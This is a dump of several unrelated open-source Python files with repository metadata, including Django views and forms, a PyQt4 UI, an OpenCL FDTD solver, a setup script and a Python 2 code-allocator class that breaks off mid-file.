        # (these are not used in calculations, so only happens here)
        F_rad = flux_rad()
        F_con = flux_con()
        print_to_screen()
        print_to_file()
        i = 0
        resolution = get_resolution()
    i += 1
    # Update parameters for next iteration:
    R += dR
    P += dP
    L += dL
    T += dT
    M += dm
    # Check if anything dropped below zero:
    # If this happens the system will stop making physical sense,
    # so the simulation should be stopped.
    # When it happens, print and save the last values of all parameters.
    if rho <= 0 or R <= 0 or P <= 0 or L <= 0 or P_rad <= 0 \
            or P_gas <= 0 or T <= 0 or M <= 0:
        F_rad = flux_rad()
        F_con = flux_con()
        print_to_screen()
        print_to_file()
        break
    # Dynamic mass step update: shrink |dm| when things change too fast,
    # grow it when everything changes slowly, within [dm_min, dm_max].
    diff_largest = max( abs(dR/R), abs(dP/P), abs(dL/L), abs(dT/T) )
    if diff_largest > diff_max:
        if dm < dm_min: # comparison is "reverse" since dm is negative
            dm *= 0.1 * (diff_max / diff_largest)
    elif diff_largest < diff_min:
        if dm > dm_max:
            dm *= 1.1
outfile.close()
|
UTF-8
|
Python
| false | false | 2,014 |
12,360,915,923,145 |
95f7809660a0e050b52b01c36aa8a389a70374ef
|
c00ab2b06bb48fee136b3bfc49cc28223e77288d
|
/kickstart/web/views.py
|
66672918dc2ca072a2d8d1633364198ea9b9264a
|
[] |
no_license
|
acmeguy/django-kickstart
|
https://github.com/acmeguy/django-kickstart
|
2e6d024142ce599510bee2436de9ab4c4f613838
|
652379860d7f51fbd673d70a44a20730b19b183e
|
refs/heads/master
| 2020-05-24T13:36:56.639666 | 2013-01-21T18:51:25 | 2013-01-21T18:51:25 | 5,890,610 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# some_app/views.py
from django.views.generic import TemplateView, FormView
from kickstart.web.forms import ContactUsForm, FanOutForm
from django.views.decorators.cache import cache_page
import redis
import json
class Home(TemplateView):
    """Landing page view.

    NOTE(review): despite the class name this renders the about-us template;
    confirm the template choice is intentional.

    Cleanup: removed get_template_names() and get_context_data() overrides
    that only delegated to super() -- the inherited implementations are
    identical, so behavior is unchanged.
    """
    template_name = "web/pages/about_us.html"
class FanOut(FormView):
    """Form view that publishes a submitted message to Redis pub/sub.

    Subscribers on the 'socketio_news' channel receive the message wrapped
    as JSON: {"title": <message>}.
    """
    template_name = "web/pages/fan_out.html"
    form_class = FanOutForm
    success_url = '/send_message/'

    def form_valid(self, form):
        # Publish the validated message, then fall through to the normal
        # FormView success handling (redirect to success_url).
        redis_subscribe = redis.StrictRedis()
        message = form.cleaned_data['message']
        redis_subscribe.publish('socketio_news',json.dumps({'title':message}))
        return super(FanOut, self).form_valid(form)
class ContactUs(FormView):
    """Contact form: emails the submitted message, then redirects home."""
    form_class = ContactUsForm
    template_name = "web/pages/contact_us.html"
    success_url = '/'
    #success_url = '/thanks/'

    def form_valid(self, form):
        # The form itself knows how to deliver the email; send only after
        # validation succeeded.
        form.send_email()
        return super(ContactUs, self).form_valid(form)
|
UTF-8
|
Python
| false | false | 2,013 |
4,217,657,902,223 |
554f7c6990721cca51ea31ba3a797e151a985e31
|
c457113f6b93f1293273644cb55ac946037512c5
|
/mainWindow.py
|
4f8d7b3d68cd9a299f5c7fa7dfd7b49ae372f8e0
|
[] |
no_license
|
melloGuilherme/VideoGame_ontology
|
https://github.com/melloGuilherme/VideoGame_ontology
|
ba3ebed483ade80519d50ac1b32ee3cd36f48719
|
72fa73b699d56f75cc79e05b8d60119cf2f71915
|
refs/heads/master
| 2021-01-10T19:41:49.206954 | 2013-06-26T02:38:54 | 2013-06-26T02:38:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainWindow.ui'
#
# Created: Wed May 22 11:30:11 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shims: QString.fromUtf8 and the UnicodeUTF8 translate
# overload exist only in older PyQt4 API versions; fall back gracefully
# when running under API v2 where strings are already unicode.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # API v2: plain str/unicode passes through unchanged.
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """pyuic4-generated UI builder for the game-search main window.

    Do not hand-edit layout values here; regenerate from mainWindow.ui
    instead (see the file header warning).
    """
    def setupUi(self, MainWindow):
        """Create and lay out all widgets on *MainWindow* (fixed 391x512)."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(391, 512)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        # Title label ("Procurar por Jogos"), styled in a large display font.
        self.label_5 = QtGui.QLabel(self.centralwidget)
        self.label_5.setGeometry(QtCore.QRect(80, 20, 231, 21))
        font = QtGui.QFont()
        font.setFamily(_fromUtf8("Gill Sans Ultra Bold"))
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.label_5.setFont(font)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        # Search-criteria grid: label column 0, input column 1, rows 0-3.
        self.gridLayoutWidget = QtGui.QWidget(self.centralwidget)
        self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 50, 371, 131))
        self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
        self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.comboBox = QtGui.QComboBox(self.gridLayoutWidget)
        self.comboBox.setObjectName(_fromUtf8("comboBox"))
        self.gridLayout.addWidget(self.comboBox, 3, 1, 1, 1)
        self.label = QtGui.QLabel(self.gridLayoutWidget)
        self.label.setObjectName(_fromUtf8("label"))
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
        self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
        self.lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
        self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
        self.gridLayout.addWidget(self.lineEdit, 0, 1, 1, 1)
        self.comboBox_3 = QtGui.QComboBox(self.gridLayoutWidget)
        self.comboBox_3.setEditable(False)
        self.comboBox_3.setObjectName(_fromUtf8("comboBox_3"))
        self.gridLayout.addWidget(self.comboBox_3, 1, 1, 1, 1)
        self.comboBox_2 = QtGui.QComboBox(self.gridLayoutWidget)
        self.comboBox_2.setObjectName(_fromUtf8("comboBox_2"))
        self.gridLayout.addWidget(self.comboBox_2, 2, 1, 1, 1)
        self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
        # Row 4: right-aligned search button (spacer pushes it right).
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem)
        self.pushButton = QtGui.QPushButton(self.gridLayoutWidget)
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.horizontalLayout.addWidget(self.pushButton)
        self.gridLayout.addLayout(self.horizontalLayout, 4, 1, 1, 1)
        # Results table below the search grid.
        self.tableView = QtGui.QTableView(self.centralwidget)
        self.tableView.setGeometry(QtCore.QRect(10, 210, 371, 261))
        self.tableView.setObjectName(_fromUtf8("tableView"))
        MainWindow.setCentralWidget(self.centralwidget)
        # Menu bar (Menu: Sobre/Sair; Inserir: empty here) and status bar.
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 391, 21))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        self.menuMenu = QtGui.QMenu(self.menubar)
        self.menuMenu.setObjectName(_fromUtf8("menuMenu"))
        self.menuInserir = QtGui.QMenu(self.menubar)
        self.menuInserir.setObjectName(_fromUtf8("menuInserir"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.actionSobre = QtGui.QAction(MainWindow)
        self.actionSobre.setObjectName(_fromUtf8("actionSobre"))
        self.actionSair = QtGui.QAction(MainWindow)
        self.actionSair.setObjectName(_fromUtf8("actionSair"))
        self.menuMenu.addAction(self.actionSobre)
        self.menuMenu.addAction(self.actionSair)
        self.menubar.addAction(self.menuMenu.menuAction())
        self.menubar.addAction(self.menuInserir.menuAction())
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Assign all user-visible (Portuguese) strings; re-run on locale change."""
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
        self.label_5.setText(_translate("MainWindow", "Procurar por Jogos", None))
        self.label.setText(_translate("MainWindow", "Nome", None))
        self.label_3.setText(_translate("MainWindow", "Mídia", None))
        self.label_4.setText(_translate("MainWindow", "Console", None))
        self.label_2.setText(_translate("MainWindow", "Fabricante", None))
        self.pushButton.setText(_translate("MainWindow", "Procurar", None))
        self.menuMenu.setTitle(_translate("MainWindow", "Menu", None))
        self.menuInserir.setTitle(_translate("MainWindow", "Inserir", None))
        self.actionSobre.setText(_translate("MainWindow", "Sobre", None))
        self.actionSair.setText(_translate("MainWindow", "Sair", None))
|
UTF-8
|
Python
| false | false | 2,013 |
2,989,297,240,564 |
50e5e0b57776ca042190de845207e090b17f6b32
|
7972acfe9a0fda519d65680bcb9db8c626e11f70
|
/yo/http_client/http_client.py
|
2771f4b83d49d1fb000679f248218240eb3e4a52
|
[] |
permissive
|
mcos/yo-py
|
https://github.com/mcos/yo-py
|
df50902cf5ae0bc337f7c7b86bd133936e388e2d
|
7fb4e8907c6cc8291bee5c6210836f7a32999b79
|
refs/heads/master
| 2022-07-04T05:20:35.194700 | 2014-07-11T03:54:26 | 2014-07-11T03:54:26 | 21,719,557 | 2 | 0 |
BSD-3-Clause
| false | 2022-06-09T23:52:36 | 2014-07-11T03:04:51 | 2018-10-11T18:36:48 | 2022-06-09T23:52:35 | 8 | 4 | 1 | 4 |
Python
| false | false |
import requests
class HttpClient(object):
    """Minimal wrapper around ``requests`` bound to a single URL."""

    def __init__(self, url):
        """Store the target *url*.

        Raises:
            ValueError: if *url* is empty or ``None``.
        """
        if not url:
            # Raise the precise built-in instead of a bare Exception; callers
            # that caught Exception still catch ValueError (backward compatible).
            raise ValueError('A url is required')
        self.url = url

    def get(self, params):
        """Issue a GET request, sending *params* as the query string."""
        return requests.get(self.url, params=params)

    def post(self, data):
        """Issue a POST request, sending *data* as the request body."""
        return requests.post(self.url, data=data)
|
UTF-8
|
Python
| false | false | 2,014 |
1,090,921,696,915 |
4042158253f352bd5dd494003af8e1b44bda0a25
|
f3df380bc51600d0e9c7046125efeaf2d1a29735
|
/RegApp/forms.py
|
a0ef2c03c4e267c8b020b9afbd79bd2b3df5a7c7
|
[] |
no_license
|
Cirmiir/RegDog
|
https://github.com/Cirmiir/RegDog
|
531c620ec9305f9aadeed024e89569ddaf3d92c0
|
d90d540200986d28ecf6575156a63d01bdaa1af3
|
refs/heads/master
| 2020-02-27T10:55:11.821738 | 2014-12-13T13:56:14 | 2014-12-13T13:56:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
from django import forms
from RegApp.models import Event, Member, Discipline, Dog, Protocol
class UserForm(forms.ModelForm):
    """Registration form for Django's built-in User model."""
    # Override so the password renders masked instead of as plain text.
    password = forms.CharField(widget=forms.PasswordInput())
    class Meta:
        model = User
        fields = ('username', 'email', 'password')
class EventForm(forms.ModelForm):
    """Create/edit form for Event; labels are in Russian ("Name", "Date")."""
    name = forms.CharField(widget=forms.TextInput(), label=u"Название")
    # NOTE(review): the date is collected as free text, not a DateField —
    # presumably parsed/validated elsewhere; confirm before relying on format.
    date = forms.CharField(widget=forms.TextInput(), label=u"Дата")
    class Meta:
        model = Event
        fields = ('name', 'date')
class MemberForm(forms.ModelForm):
    """Create/edit form for Member (first/middle/last name)."""
    firstName = forms.CharField(widget=forms.TextInput(), label=u"Имя")
    middleName = forms.CharField(widget=forms.TextInput(), label=u"Отчество")
    lastName = forms.CharField(widget=forms.TextInput(), label=u"Фамилия")
    class Meta:
        model = Member
        fields = ('firstName', 'middleName', 'lastName')
        # The owning user is set by the view, not by the form.
        exclude = ('user',)
class DogForm(forms.ModelForm):
    """Create/edit form for Dog registration data."""
    nickname = forms.CharField(widget=forms.TextInput(), label=u"Кличка")
    pid = forms.CharField(widget=forms.TextInput(), label=u"Пид")
    fci = forms.CharField(widget=forms.TextInput(), label=u"ФКИ")
    # NOTE(review): sex is free text rather than a choice field — confirm
    # whether a ChoiceField is intended.
    sex = forms.CharField(widget=forms.TextInput(), label=u"Пол")
    birthday = forms.DateTimeField(widget=forms.DateTimeInput(), label=u"День рождения")
    breed = forms.CharField(widget=forms.TextInput(), label=u"Порода")
    class Meta:
        model = Dog
        fields = ('nickname', 'pid', 'fci', 'sex', 'birthday', 'breed')
        # The owning user is set by the view, not by the form.
        exclude = ('user',)
class ProtocolForm(forms.ModelForm):
    """Protocol entry form linking a member, an event and a discipline."""
    event = forms.ModelChoiceField(queryset=Event.objects.all(),
                                   empty_label="Выберите Соревнование", label=u"Соревнования")
    member = forms.ModelChoiceField(queryset=Member.objects.all(),
                                    empty_label="Выберите участника", label=u"Участник")
    class Meta:
        model = Protocol
        fields = ('member', 'event', 'discipline')
    def __init__(self, *args, **kwargs):
        super(ProtocolForm, self).__init__(*args, **kwargs)
        # Rebuild the discipline field per instance so its queryset is
        # evaluated fresh. Fixed: empty_label was the misspelled English
        # "Choise Discipline", inconsistent with the Russian labels above.
        self.fields['discipline'] = forms.ModelChoiceField(queryset=Discipline.objects.all(),
                                                           empty_label="Выберите дисциплину", label=u"Дисциплина")
|
UTF-8
|
Python
| false | false | 2,014 |
17,609,365,913,926 |
6209bfb608daf273d71ec17382e9274e6b0522d4
|
78477cc32db8a288eca370b47a284feff1dec14d
|
/setup.py_template
|
0d4d7708bad893b6cb96ec52d995bcd3c173c76b
|
[
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0",
"CC0-1.0",
"CC-PDDC",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
Akm0d/python-pdcurses
|
https://github.com/Akm0d/python-pdcurses
|
b3ecc39b4b754a6a7d32f01e036458e5fdeb90f9
|
a868ea7bd4cb6d13fde7eededa60f42fcb44ed51
|
refs/heads/master
| 2021-01-04T12:59:37.973344 | 2011-02-07T01:52:00 | 2011-02-07T01:52:00 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
"""
python-pdcursesPDCURSES_FLAV setup module.
"""
import distutils.version
from distutils.core import setup, Extension
import os, sys
# Extra build flags passed to the Extension below; left empty here and
# presumably filled in per-platform by the template's generator — TODO confirm.
extra_link = []
extra_comp = []
extra_libs = []
def monkey_cmp (self, other):
    """
    Three-way compare for LooseVersion instances.

    Replacement ``_cmp`` used to monkey-patch distutils on early
    Python 3.0 releases. Returns -1, 0 or 1.
    """
    # Promote a plain version string to a LooseVersion before comparing.
    if isinstance(other, str):
        other = distutils.version.LooseVersion(other)
    # Classic cmp() semantics on the parsed version component lists.
    if self.version < other.version:
        return -1
    elif self.version > other.version:
        return 1
    return 0
# Apply the patch only on the narrow hexversion window covering Python
# 3.0.0–3.0.1, where LooseVersion comparison was broken (see monkey_cmp).
if sys.hexversion <= 0x30001f0 and sys.hexversion >= 0x30000f0:
    distutils.version.LooseVersion._cmp = monkey_cmp
def main ():
    """Run distutils setup for the pdcurses _curses replacement module.

    PDCURSES_FLAV in the package name is a placeholder substituted by the
    template's generator.
    """
    setup (
        name = "pdcursesPDCURSES_FLAV",
        version = "0.3.4",
        description = "PDCurses drop-in replacement for _curses.",
        author = "Jon McManus, PDCurses",
        author_email = "[email protected]",
        url = "http://www.github.com/jmcb/python-pdcurses",
        long_description = """""",
        classifiers = [
            'Development Status :: 5 - Production/Stable', # PDCurses is a stable replacement for _curses.
            'Environment :: Console',
            'Environment :: Console :: Curses',
            'Intended Audience :: Developers',
            'License :: Public Domain',
            'Operating System :: OS Independent',
            'Programming Language :: C',
            'Programming Language :: Python',
            # Fixed: these classifiers used a single colon ("Python : 2.x"),
            # which is not a valid trove classifier and is rejected by PyPI.
            'Programming Language :: Python :: 2.3',
            'Programming Language :: Python :: 2.4',
            'Programming Language :: Python :: 2.5',
            'Programming Language :: Python :: 2.6',
            'Programming Language :: Python :: 2.7',
            'Topic :: Software Development :: Libraries :: Python Modules',
            ],
        # Build the C extension against a locally-provided pdcurses library.
        ext_modules = [Extension ('_curses',
                   sources = ['_curses_panel.c', '_cursesmodule.c'],
                   define_macros = [("WINDOW_HAS_FLAGS", None)],
                   extra_compile_args = ['-L./'] + extra_comp,
                   extra_link_args = ['-L./'] + extra_link,
                   libraries = ["pdcurses"] + extra_libs)],
        # Ship the Windows DLL alongside the extension.
        data_files = [(".", ["pdcurses.dll"])],
        include_dirs = ['./'],
        )
# Standard entry-point guard: run setup only when executed as a script.
if __name__=="__main__":
    main()
|
UTF-8
|
Python
| false | false | 2,011 |
1,236,950,600,584 |
6cf58b8cea407b00234f41b15869137f663a1f43
|
79121e28227cf8ad6805b35243468de6b4a0dc93
|
/scoremanager/idetools/test/test_SegmentPackageManager_edit_init_py.py
|
0c696a1c21492b4cf0218abb196f8e5d63ec27d2
|
[
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"LGPL-2.1-or-later",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
jefftrevino/abjad
|
https://github.com/jefftrevino/abjad
|
ac783770630ec0806c9886bb35bb9f66bbb3c88c
|
3ea07a1339c26689de228b2690f76f0c41a25926
|
refs/heads/master
| 2021-01-22T01:38:30.480942 | 2014-09-17T23:35:18 | 2014-09-17T23:35:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
from abjad import *
import scoremanager
ide = scoremanager.idetools.AbjadIDE(is_test=True)
def test_SegmentPackageManager_edit_init_py_01():
    r'''Works when __init__.py doesn't exist.
    '''
    input_ = 'red~example~score g A ne q'
    ide._run(input_=input_)
    contents = ide._transcript.contents
    # Fixed: the containment check was assigned to a local variable and never
    # asserted, so this test could never fail. Assert it explicitly.
    assert 'Can not find' in contents
|
UTF-8
|
Python
| false | false | 2,014 |
11,948,599,061,254 |
dbcddc66ef17ee9e2960030429624a39d845adac
|
be138468218872ab0471185167c86f5061cbbd74
|
/trunk/SUAVE/Methods/Flight_Dynamics/__init__.py
|
99f08f0cf5a9b1bc5b0c3a6259a7e491cffdc7d1
|
[
"CC-BY-NC-SA-4.0",
"CC-BY-SA-3.0"
] |
non_permissive
|
thearn/SUAVE
|
https://github.com/thearn/SUAVE
|
e203816b73591c30e57b33a71ce3f44a46db1bac
|
bcca96e2e1dab5c482dc4447d8e6752406f80fbe
|
refs/heads/master
| 2021-01-18T06:52:35.804639 | 2014-08-20T22:14:52 | 2014-08-20T22:14:52 | 23,135,993 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import FlightDynamics
import equations_of_motion
import Static_Stability
import Dynamic_Stability
|
UTF-8
|
Python
| false | false | 2,014 |
15,934,328,689,601 |
fc1530f7d02b7169cf0a2dc55c5f208765dec71e
|
25900311cb220b977a21d26ab35db40e56a26828
|
/fcs/fcs/conftest.py
|
3da5adf98e25b374ad98edcdc1a4ba568e8fb106
|
[] |
no_license
|
agh-glk/fcs
|
https://github.com/agh-glk/fcs
|
d246493cfd762aa1474e0546773ce35711d95049
|
df8d816463b29d12d1e148bdaa68c7813cd9c6ef
|
refs/heads/master
| 2021-01-10T20:31:57.199070 | 2014-11-06T09:52:27 | 2014-11-06T09:52:27 | 14,281,330 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'fcs.settings'
|
UTF-8
|
Python
| false | false | 2,014 |
19,688,130,116,529 |
e5d2e3b3b40e30489f9a9c227f52f3dee5e9a9d8
|
bb89e2fb7b4cf7651c231ff15ed89b9ce9988cd0
|
/koieadmin/koie/migrations/0005_auto_20141104_1618.py
|
5c6a65e1f412daa328982b3375aebc21e0241428
|
[] |
no_license
|
sklirg/it1901
|
https://github.com/sklirg/it1901
|
b58142ea090530afb07370e8ff6bae54f575f1cc
|
73e6fce821bc152ef5fac53a67a127ac41dec844
|
refs/heads/master
| 2016-09-10T00:20:45.963347 | 2014-11-18T20:55:26 | 2014-11-18T20:55:26 | 23,614,453 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
    """Set Report's get_latest_by ordering and add notification_date."""
    dependencies = [
        ('koie', '0004_damage'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='report',
            options={'get_latest_by': 'reported_date'},
        ),
        migrations.AddField(
            model_name='report',
            name='notification_date',
            # auto_now=True updates the field on every save; the literal
            # date(2014, 11, 4) only back-fills existing rows at migration
            # time (preserve_default=False drops it afterwards).
            field=models.DateField(default=datetime.date(2014, 11, 4), auto_now=True),
            preserve_default=False,
        ),
    ]
|
UTF-8
|
Python
| false | false | 2,014 |
3,358,664,442,469 |
fc32c3ab856e45dca58d6c45d3db0911bde9cbdf
|
fafb89a3552e4dbb47d134966462ef5f3f37f576
|
/KEMP/v0.6_ovelap_ok/fdtd3d/gpu/core_split2.py
|
c6f207343d62198baa2396a3751da81219adf0a7
|
[] |
no_license
|
EMinsight/fdtd_accelerate
|
https://github.com/EMinsight/fdtd_accelerate
|
78fa1546df5264550d12fba3cf964838b560711d
|
a566c60753932eeb646c4a3dea7ed25c7b059256
|
refs/heads/master
| 2021-12-14T03:26:52.070069 | 2012-07-25T08:25:21 | 2012-07-25T08:25:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import pyopencl as cl
from kemp.fdtd3d.util import common, common_gpu
from fields import Fields
class CoreSplit2:
    # Compiles the split E/H FDTD update kernels and precomputes the kernel
    # argument lists for the interior ('') and the x-boundary slabs
    # ('pre'/'post'), so boundary updates can run separately from the bulk.
    def __init__(self, fields):
        """Build the OpenCL program and argument/global-size tables.

        fields: a gpu Fields instance providing the context, grid sizes,
        field buffers and optional ce/ch coefficient buffers.
        """
        common.check_type('fields', fields, Fields)
        # local variables
        context = fields.context
        ns_pitch = fields.ns_pitch
        pad = fields.pad
        precision_float = fields.precision_float
        dtype_str_list = fields.dtype_str_list
        ce_on = fields.ce_on
        ch_on = fields.ch_on
        eh_bufs = fields.eh_bufs
        if ce_on:
            ce_bufs = fields.ce_bufs
        if ch_on:
            ch_bufs = fields.ch_bufs
        ls = fields.ls
        # program
        # Template substitution: when coefficient arrays are disabled the
        # constant 0.5 (typed for the chosen precision) is baked into the
        # kernel source instead of passing buffers.
        str_pad = '' if pad==0 else '-%s' % pad
        coeff_constant = {'single': '0.5f', 'double': '0.5'}[precision_float]
        macros = ['ARGS_CE', 'CEX', 'CEY', 'CEZ', \
                'ARGS_CH', 'CHX', 'CHY', 'CHZ', \
                'DX', 'PAD', 'DTYPE', 'PRAGMA_fp64']
        values = ['', coeff_constant, coeff_constant, coeff_constant, \
                '', coeff_constant, coeff_constant, coeff_constant, \
                str(ls), str_pad] + dtype_str_list
        if ce_on:
            values[:4] = [ \
                    ', __global DTYPE *cex, __global DTYPE *cey, __global DTYPE *cez', \
                    'cex[idx]', 'cey[idx]', 'cez[idx]']
        if ch_on:
            values[4:8] = [ \
                    ', __global DTYPE *chx, __global DTYPE *chy, __global DTYPE *chz', \
                    'chx[idx]', 'chy[idx]', 'chz[idx]']
        ksrc = common.replace_template_code( \
                open(common_gpu.src_path + 'core_split.cl').read(), macros, values)
        program = cl.Program(context, ksrc).build()
        # arguments
        e_args = ns_pitch + eh_bufs
        h_args = ns_pitch + eh_bufs
        if ce_on:
            e_args += ce_bufs
        if ch_on:
            h_args += ch_bufs
        # Each kernel takes a linear [start, stop) index range. 'pre'/'post'
        # cover one nyzp-sized yz-slab at the x boundary (first slab for E,
        # last slab for H); '' covers the whole domain.
        nx, ny, nz_pitch = ns_pitch
        nyzp = ny * nz_pitch
        e_args_dict = { \
                '': [np.int32(0), np.int32(nx*nyzp)] + e_args, \
                'pre': [np.int32(0), np.int32(nyzp)] + e_args, \
                'post': [np.int32(nyzp), np.int32(nx*nyzp)] + e_args}
        h_args_dict = { \
                '': [np.int32(0), np.int32(nx*nyzp)] + h_args, \
                'pre': [np.int32((nx-1)*nyzp), np.int32(nx*nyzp)] + h_args, \
                'post': [np.int32(0), np.int32((nx-1)*nyzp)] + h_args}
        # Round the global work size up to a multiple of the local size.
        gs = lambda n: int(n) if (n % fields.ls) == 0 else int(n - (n % fields.ls) + fields.ls)
        gs_dict = { \
                '': gs(nx*nyzp), \
                'pre': gs(nyzp), \
                'post': gs((nx-1)*nyzp)}
        # global variables and functions
        self.mainf = fields
        self.program = program
        self.e_args_dict = e_args_dict
        self.h_args_dict = h_args_dict
        self.gs_dict = gs_dict
        # append to the update list
        #self.priority_type = 'core'
        #self.mainf.append_instance(self)
    def update_e(self, part=''):
        # Launch the E-field kernel for the requested part ('', 'pre', 'post').
        self.program.update_e(self.mainf.queue, (self.gs_dict[part],), (self.mainf.ls,), *self.e_args_dict[part])
    def update_h(self, part=''):
        # Launch the H-field kernel for the requested part ('', 'pre', 'post').
        self.program.update_h(self.mainf.queue, (self.gs_dict[part],), (self.mainf.ls,), *self.h_args_dict[part])
|
UTF-8
|
Python
| false | false | 2,012 |
7,052,336,325,616 |
1d326132e2f6cde259464420c51da53260b3ba57
|
750b3616b1f89869f69895dee79a46a0aa59caf0
|
/usr/lib/gen/seller.py
|
f3bcc3f855dbebbe860ac3ac44729b06d993132f
|
[] |
no_license
|
boris-r-v/ArmDsp-Generator
|
https://github.com/boris-r-v/ArmDsp-Generator
|
4f49a265c6a2bcbdfd3bd5f54dd605ea90683fda
|
5ecbc0854be2004c19b0288e0134fe0b96eb5a84
|
refs/heads/master
| 2019-08-01T21:03:19.476798 | 2011-06-21T11:41:50 | 2011-06-21T11:41:50 | 1,928,782 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import string
import re
# Seller (allocator) of TU and TS codes (telecontrol commands / telesignals)
class TSandTUseller:
    """Hands out sequential group/impulse code pairs and persists the last
    values to a file so numbering continues across runs (Python 2 code)."""
    # maximum number of impulses in a group
    maxImpulses=8
    isFirstCall=True
    # circle (ring) number — always 0 here
    circle=0
    # station number — always 0 here
    station=0
    # current group
    group=1
    # current impulse within the group
    impulse=0
    last=""
    iniStr=""
    isNewGroup = False
    # constructor (takes the max number of impulses per group and the name of
    # the file in which the last used group and impulse values are stored)
    def __init__(self, maxImpulses, last, lastValue="6:0", _isNewGroup = False):
        self.maxImpulses = maxImpulses
        self.last = last
        self.isNewGroup = _isNewGroup
        print "++++ Начало записи значения ТС/ТУ"
        # Read the persisted "group:impulse" state; create the file with the
        # default value on first run.
        try:
            file=open(last,'r')
            lastValue=file.read()
            file.close()
        except IOError, (errno, streror):
            file=open(last,'w')
            file.write(lastValue)
            file.close()
        lastValues=re.split(":",lastValue)
        self.group=string.atoi(lastValues[0])
        self.impulse=string.atoi(lastValues[1])
        print "Последняя записываемая группа - "+str(self.group)+", импульс - "+str(self.impulse)
    # buy (allocate) a formatted TU/TS code string
    # (isNewGroup - whether to start a new group; startImp - first impulse number)
    def buy(self, name="", isNewGroup=False, startImp=1):
        #if startImp!=1:
        #    self.impulse=startImp
        if self.isFirstCall:
            self.iniStr+="Группа"+str(self.group)+"\t{\t"
            self.isFirstCall=False
        if isNewGroup:
            # Pad the rest of the current group with empty entries and close it.
            for i in range(self.impulse, self.maxImpulses+1):
                self.iniStr+=str(i)+":\t"
                if i==self.maxImpulses:
                    self.iniStr+="}"
                    self.impulse=self.maxImpulses
        self.impulse+=1
        if self.impulse > self.maxImpulses:
            # Group is full: advance to the next group and reset the impulse.
            self.group+=1
            self.impulse=startImp
            self.iniStr+="}\nГруппа"+str(self.group)+"\t{\t"
        self.iniStr+=str(self.impulse)+":"+str(name)+"\t"
        # Returned format: "circle station group impulse" (space separated).
        return str(self.circle)+" "+str(self.station)+" "+str(self.group)+" "+str(self.impulse)
    def endIni(self):
        # Close the ini text: pad the last group with empty entries.
        for i in range(self.impulse, self.maxImpulses+1):
            self.iniStr+=str(i)+":\t"
            if i==self.maxImpulses:
                self.iniStr+="}"
    # buy (allocate) a TU/TS code as a dict (isNewGroup - start a new group or not)
    def buyList(self,isNewGroup=False):
